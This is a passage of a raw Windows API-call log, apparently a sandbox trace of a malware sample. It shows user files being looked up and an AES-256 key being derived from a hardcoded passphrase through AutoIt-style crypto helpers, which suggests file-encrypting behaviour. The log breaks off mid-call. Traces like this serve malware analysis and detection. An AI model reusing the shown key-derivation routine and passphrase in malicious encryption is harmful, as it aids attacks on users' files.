[0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0103.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0103.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0103.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0103.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0103.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0103.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0103.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0103.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.660] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e81fc0, ftCreationTime.dwHighDateTime=0x1d5eb4d, ftLastAccessTime.dwLowDateTime=0xc760ef40, ftLastAccessTime.dwHighDateTime=0x1d5e1d5, ftLastWriteTime.dwLowDateTime=0xc760ef40, ftLastWriteTime.dwHighDateTime=0x1d5e1d5, nFileSizeHigh=0x0, nFileSizeLow=0x18cfb, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="WfuP9I.swf", cAlternateFileName="")) returned 0x41ac2c0 [0103.660] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0103.661] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0103.661] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0103.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0103.662] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.662] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0103.662] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0103.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0103.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0103.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0103.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797048, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0103.664] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0103.665] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0103.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.665] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0103.665] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.707] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.707] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0103.707] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0103.707] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0103.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0103.707] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0103.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0103.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0103.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cab68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0103.708] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0103.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.708] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0103.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0103.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0103.708] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac540) returned 1 [0103.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0103.709] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0103.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0103.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0103.711] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0103.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0103.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 